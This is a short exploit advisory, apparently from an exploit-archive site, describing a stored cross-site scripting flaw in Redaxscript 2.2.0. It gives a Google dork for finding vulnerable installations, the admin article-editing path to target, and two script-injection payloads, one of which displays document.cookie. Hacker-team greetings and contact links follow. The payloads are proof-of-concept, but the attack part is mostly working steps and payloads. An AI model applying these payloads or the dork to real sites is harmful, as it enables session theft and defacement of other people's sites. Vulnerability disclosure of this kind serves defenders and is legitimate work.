facebook facebook twitter rss

Redaxscript 2.2.0 XSS Vulnerability

Author: Oussama911 , Published: 10-01-2015
# Exploit Title: Redaxscript 2.2.0 XSS Vulnerability
# Date: 04-01-2015
# Google Dork : Powered by Redaxscript 2.2.0
# Exploit Author: Oussama911
# Version: 2.2.0
# Vendor Homepage: http://www.redaxscript.com/
# Tested on: OWASP Mantra & Iceweasel
# Greetz : Toxic Dz - Dz Mafia - Anonymous Algeria - Virus28 Team - Djamel11154 - Russi173Oox
# Contact : fb.me/ouss911algerianhacker
# contact team : fb.me/teamvirus28
# Vulnerability Description:

CMS is vulnerable to XSS attacks. You can run XSS payloads at new article section.

XSS Vulnerability :

Go edit or add new article page

"http://{target-url}/admin/edit/extras/1"

Add new article and use payloads;

"><script>alert(String.fromCharCode(48, 120, 57, 55))</script>

or

"><script>alert(document.cookie)</script>


========
Credits:
========

#Vulnerability found and advisory written by Oussama911 ( Virus28 Team )

Like us on Facebook :